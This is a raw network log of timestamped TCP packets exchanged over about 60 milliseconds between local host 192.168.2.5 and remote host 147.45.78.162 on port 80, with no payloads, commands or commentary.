Jul 1, 2024 13:02:13.954921007 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.954922915 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954936028 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.954938889 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954951048 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.954955101 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954967022 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.954969883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.954982996 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.954986095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.955001116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.955007076 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.955033064 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.955064058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.955588102 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.955614090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.955624104 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.955656052 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.955833912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.955848932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.955864906 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.955872059 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.955878973 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.955888987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.955893993 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.955903053 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.955909014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.955919027 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.955924988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.955940008 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.955955029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.955955029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.955956936 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.955971003 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.955971956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.955986023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.955997944 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.956002951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.956017971 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.956026077 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.956056118 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.956816912 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.956831932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.956847906 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.956865072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.956866026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.956878901 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.956882000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.956897974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.956898928 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.956912041 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.956912994 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.956928015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.956931114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.956948996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.956950903 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.956964970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.956974030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.956980944 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.956996918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957001925 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.957011938 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957039118 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.957112074 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.957742929 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957757950 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957772970 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957787991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.957793951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957803011 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.957808971 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957818031 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.957823038 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957834005 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.957839966 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957849026 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.957854986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957866907 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.957870007 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957881927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.957885981 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957897902 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.957901001 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957914114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.957916975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957931042 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957931042 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.957947969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.957947969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.957974911 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.957999945 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.958599091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.958614111 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.958635092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.958636999 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.958652020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.958653927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.958667040 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.958671093 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.958682060 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.958687067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.958703995 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.958708048 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.958719015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.958724976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.958734035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.958746910 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.958750963 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.958764076 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.958791018 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.959335089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.959351063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.959364891 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.959379911 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.959386110 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.959394932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.959402084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.959410906 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.959427118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.959434032 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.959440947 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.959454060 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.959455013 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.959470034 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.959479094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.959484100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.959498882 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.959508896 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.959512949 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.959527969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.959528923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.959557056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.959599018 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.960315943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.960331917 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.960345984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.960355997 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.960361004 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.960371971 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.960376024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.960387945 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.960391045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.960403919 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.960405111 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.960419893 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.960429907 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.960442066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.960448980 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.960457087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.960474014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.960478067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.960498095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.960503101 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.960513115 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.960526943 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.960530043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.960545063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.960545063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.960561991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.960586071 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.961262941 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.961285114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.961298943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.961312056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.961313009 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.961328030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.961329937 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.961339951 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.961344957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.961354971 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.961359024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.961374044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.961389065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.961389065 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.961404085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.961415052 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.961417913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.961430073 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.961432934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.961450100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.961457014 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.961483002 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.967561960 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.967614889 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.967632055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.967653036 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.967796087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.967814922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.967813969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.967813969 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.967837095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.967839956 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.967858076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.967858076 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.967873096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.967896938 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.974971056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.975003958 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.975023031 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.975039005 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.975048065 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.975086927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.975138903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.975171089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.975183964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.975204945 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.975218058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.975239038 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.975248098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.975279093 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.978635073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.978681087 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.978688002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.978720903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.978741884 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.978785038 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.978816986 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.978864908 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.978899956 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.978933096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.978967905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.978995085 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.979005098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.979048967 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.979073048 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.989605904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.989639044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.989662886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.989674091 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.989705086 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.989708900 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.989743948 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.989746094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.989746094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.989779949 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.989794016 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.989829063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.989892960 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.989969015 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.989983082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.990014076 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.994122028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.994174957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.994177103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.994206905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.994225025 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.994240046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.994256973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.994291067 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.994293928 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.994324923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.994332075 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.994359016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.994369030 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.994400978 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.994534969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.994582891 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.998691082 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.998743057 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.998743057 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.998776913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.998786926 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.998819113 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.998857021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.998889923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.998902082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.998923063 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.998933077 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.998956919 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:13.998965979 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:13.999000072 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.008080959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.008133888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.008133888 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.008167028 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.008176088 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.008208036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.008655071 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.008688927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.008714914 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.008723021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.008744955 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.008755922 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.008771896 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.008790016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.008800983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.008829117 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.010588884 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.010622025 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.010637045 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.010656118 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.010664940 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.010689974 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.010699034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.010723114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.010735035 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.010757923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.010770082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.010807991 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.015207052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015239000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015274048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015309095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015320063 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.015343904 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015379906 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015381098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.015400887 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.015429974 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.015602112 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015635967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015650034 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.015670061 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015681028 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.015702963 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015713930 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.015736103 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015746117 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.015769005 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015778065 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.015804052 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015815973 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.015836000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015856028 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.015868902 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015887976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.015914917 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.015921116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015955925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.015965939 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.015989065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.016024113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.016025066 CEST	49705	80	192.168.2.5	147.45.78.162
